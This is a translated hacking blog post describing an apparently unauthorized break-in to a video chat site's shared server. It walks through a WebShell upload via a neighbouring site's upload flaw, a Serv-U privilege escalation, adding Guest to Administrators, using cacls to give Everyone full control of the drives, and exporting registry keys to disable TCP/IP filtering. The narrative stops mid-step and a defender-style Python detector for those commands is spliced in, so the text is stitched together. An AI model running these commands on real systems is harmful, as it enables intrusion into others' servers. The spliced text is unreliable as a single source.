From uploading a WebShell to logging in on 3389: breaking through TCP/IP filtering

xiaoxiao2021-03-06  36

Lvhuana

1: Getting a WebShell

A small test this evening. I am far too much of a newbie, so this is all I could manage......... It has been a while since I did it, so there is no way to add screenshots; I hope this little post is still easy to follow. It was a boring day, and with nothing to do at night I went to a video chat site and noticed one chat room that was extremely popular: 500 people inside (full), and after refreshing N times I still could not get in.......... Depressing! :( Since I had nothing else to do, I decided to test how secure the host was, heh heh (I am such a noob, talking about other people's security is really flattering myself). I pinged it from CMD to get the other side's IP, then went to http://whois.Webhosting.info/ and looked up the other sites on that IP. Ha, there were dozens of sites on it, so I figured I could find one or two with a vulnerability. I searched and finally found a page with an upload vulnerability, http://www.xxx.net/upfile_soft.asp, and uploaded a WebShell (Haoyang 2005 official version) through it (I won't go on about how to upload; upload tools are everywhere these days).

2: Escalating privileges and creating a user

Got the WebShell and happily logged in, only to find I had hardly any permissions: I could only see the WebShell's own directory (the C, D, E and F drives could not be browsed), and I did not even have permission to delete files. Depressing........ Back in 〖Server〗 I looked at which services the host had open and found it was running Terminal Services and the Serv-U service. Ha, now there is something to work with ^_^ I scanned his IP with SuperScan, and from the banner saw that the Serv-U version he was using was 5.0.

Went to 〖wscript.shell〗 to try executing CMD commands. No luck: entering net user returned nothing. Then, executing the CMD command through wscript.shell and entering NET USER again, the other side's user list came back. Haha, this is good, I can get it!! Uploaded the Serv-U privilege escalation tool to the directory D:\a004\tggtwe\****.com\uploadsoft and renamed it test.exe, then went back to 〖wscript.shell〗 to execute commands. Hehe, the fat chicken is about to be in hand, please wait~

Execute commands with WScript.Shell:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest /active:yes"   # activate the Guest account, I like to use this account
d:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest lvhuana"   # set the guest account's password to lvhuana
d:\a004\tggtwe\****.com\uploadsoft\test.exe "net localgroup administrators guest /add"   # raise guest to Admin rights

With the account set up, run net localgroup administrators to check; the echo showed it had been added successfully.

Then, running netstat -an, I saw that the Terminal Services port he had open was the default 3389. OK, let's try connecting~

3: Breaking through the TCP/IP filtering

Connect!? Ugh........... I got out SuperScan to scan his 3389 and it could not be found at all...... (a firewall is on!? Damn, my luck......) With no other way, back to WScript.shell again to run CMD commands:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe C: /E /T /G everyone:F"   # set the C drive so Everyone can browse it
d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe D: /E /T /G everyone:F"   # set the D drive so Everyone can browse it
d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe E: /E /T /G everyone:F"   # set the E drive so Everyone can browse it
d:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe F: /E /T /G everyone:F"   # set the F drive so Everyone can browse it

With that, the whole hard drive could at least be traversed. I went all over the hard disk and did not find any firewall files, so I had a pretty good idea: he was definitely using TCP/IP filtering! (Of course, it is also possible the server sits in an internal network; you can tell from ipconfig /all.) To break through TCP/IP filtering we can modify his registry. What we have to do is export three of his registry keys, modify them, and import them back. Back to 〖wscript.shell〗 to run CMD commands:

d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"   # export the first registry location for TCP/IP filtering
d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip"   # export the second registry location for TCP/IP filtering
d:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip"   # export the third registry location for TCP/IP filtering

Then back in 〖stream〗 or 〖FSO〗 I found 1.reg, 2.reg and 3.reg quietly lying there, hehe~ Downloaded 1.reg, 2.reg and 3.reg to my own hard drive to modify the TCP/IP filtering. First open 1.reg and find "EnableSecurityFilters"=dword:00000001; change the trailing 1 to 0 and save,
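An added example from the defender's side, not code from the original post: a small Python checker that flags the command chain walked through above (Guest activation, a password set on Guest, Guest added to Administrators, cacls granting Everyone full control on a drive root, regedit export of the Tcpip service key) in constructed sample command lines, and that reads an exported .reg fragment to report whether EnableSecurityFilters has been zeroed. The sample lines, the .reg text and the masked domain placeholder are all constructed here.

```python
import re

# Detection rules for the post-exploitation steps described in the post above.
# All sample data below is constructed for this example, not taken from a real host.
RULES = [
    ("guest_account_enabled",
     re.compile(r"\bnet\s+user\s+guest\s+/activ(?:e)?:yes", re.I)),
    ("guest_password_set",
     re.compile(r"\bnet\s+user\s+guest\s+(?!/)\S+", re.I)),
    ("guest_added_to_admins",
     re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("drive_root_opened_to_everyone",
     re.compile(r"\bcacls(?:\.exe)?\s+[a-z]:\\?\s.*?/g\s+everyone:f", re.I)),
    ("tcpip_key_exported",
     re.compile(r"\bregedit(?:\.exe)?\s+[-/]e\s+\S+\s+hk(?:ey_local_machine|lm)"
                r"\\system\\\S*controlset\S*\\services\\tcpip\b", re.I)),
]

# Constructed command lines mirroring the chain in the post (domain masked as in the post).
SAMPLE_COMMANDS = [
    r'd:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest /active:yes"',
    r'd:\a004\tggtwe\****.com\uploadsoft\test.exe "net user guest lvhuana"',
    r'd:\a004\tggtwe\****.com\uploadsoft\test.exe "net localgroup administrators guest /add"',
    r'd:\a004\tggtwe\****.com\uploadsoft\test.exe "cacls.exe C: /E /T /G everyone:F"',
    r'd:\a004\tggtwe\****.com\uploadsoft\test.exe "regedit -e d:\a004\tggtwe\****.com\uploadsoft\1.reg '
    r'HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"',
    r'notepad.exe C:\notes.txt',
]

def scan_commands(lines):
    """Return (line_number, rule_name) pairs for every command line that matches a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((n, name))
    return hits

# Constructed .reg export of the Tcpip parameters key, in the format regedit -e writes.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000001
"""

REG_FILTER_VALUE = re.compile(r'"EnableSecurityFilters"\s*=\s*dword:([0-9a-f]{8})', re.I)

def security_filters_enabled(reg_text):
    """True if the export keeps TCP/IP filtering on, False if it was zeroed, None if the value is absent."""
    m = REG_FILTER_VALUE.search(reg_text)
    return None if m is None else int(m.group(1), 16) != 0
```

Comparing security_filters_enabled() on a fresh export against the value in a .reg file found in a web-writable directory shows whether the filtering setting was changed by hand rather than by policy.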

Please credit the original source when reposting: https://www.9cbs.com/read-62077.html
